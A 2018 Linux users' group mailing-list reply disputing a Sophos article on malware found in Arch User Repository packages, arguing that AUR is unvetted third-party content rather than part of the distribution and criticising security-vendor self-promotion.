[sf-lug] Malware hidden in Linux packages First Gentoo more lately Arch.

Wed Jul 11 18:05:53 PDT 2018

Quoting Bobbie Sellers (bliss-sf4ever at dslextreme.com):

>     Well this is a clever if nasty hack.
> 
> <https://nakedsecurity.sophos.com/2018/07/11/another-linux-distro-poisoned-with-malware/>

Never, ever, ever believe self-promotion articles from anti-virus /
security companies without careful cross-checking.

1.  The Arch User Repository is _not_ Arch Linux.  This is like
confusing the contents of http://addons.mozilla.org/ (a public bazaar) 
with a distro-packaged and vetted copy of Firefox.

2.  Halfway down the page, after a good deal of rather mindless
sensationalism, the Sophos finally acknowledges that point, himself:

   To be fair to the Arch team, the hacked packages were found on AUR,
   which is the Arch User Repository, which isn’t vouched for or vetted
   by the Arch maintainers – in the same sort of way that none of the
   off-market Android forums are vouched for by Google.

Quite so.  Moreover, all AUR contents are _specifically disclaimed_ as 
unvetted contents that you choose to trust at your own risk.  It's right
there at the top of the page, in bold type.  https://aur.archlinux.org/

Disappointingly, the Sophos author then tries to walk his
acknowledgement back:

   Nevertheless, the AUR site is logoed up and branded as the 
   _Arch_ User Repository, not merely the User Repository, so a bit less
   attitude from the Arch team wouldn’t hurt.

Hey, Sophos sales flack, Arch Linux's AUR's a carefully labelled
public-bazaar site with zero checking, something that should be familiar
to all computer users not just newly arrived from Mars, including (say)
all persons familiar with http://addons.mozilla.org/ and untold similar
places.  Where do you get off changing the subject to the Arch
developers' 'attitude' at responding to inane complaints?  Maybe it's
because you want to flog Sophos 'anti-virus' products?

  Note. We don’t expect this thing to be a problem in real life, but
  Sophos products will nevertheless detect the abovementioned scripts as
  Linux/BckDr-RVR, and block the C&C URLs used to “feed” the attack. (If
  you’d like to try Sophos Anti-Virus for Linux, by the way, it’s 100%
  free both at work and at home.)

Oh, _right_, yes, of course you do.

> It has been cleaned up by the time I heard about but this was on
> distributions used by much more knowledgeable users than myself.

No, it wasn't on a distribution.

Just because you can damage a distribution by adding unwise third-party
contents from nobody-in-particular to it, doesn't make that the
distribution's fault.

There is no way to prevent a local Linux administrator armed with root
authority from taking very unwise actions and destroying or damaging
his/her system -- and that is the case with or without 'malware'.  A
reckless system owner using /bin/sh is _even_ more dangerous than a
programmer wielding a screwdriver.

And layering 'anti-virus' software onto such a user's system is not an
improvement, failing as it does to address the actual problem of
reckless admin behaviour.

Installing software made by nobody-in-particular from third-party
unvetted sites like the AUR is reckless admin behaviour.  If you're
willing to take dangerous actions like that, you actually have a lot
bigger headaches than 'malware'.

> The same sort of thing could be done to other distributions so read
> the article if you have not already.

No, it could not be done to 'other distributions', because it wasn't
done to a distribution in this case, in the first place.  But, sure,
read the Sophos self-promotion piece -- skeptically.  _Even_ that
slanted piece eventually gets around to telling the truth.  You just
have to read far enough down the page.

Further examples of how anti-malware / security industry figures tend to
distort, misinform, and dissemble, attempting to bullshit even technical
users into outsourcing thinking and instead just buy their junk (long):
http://linuxmafia.com/faq/Essays/security-snake-oil.html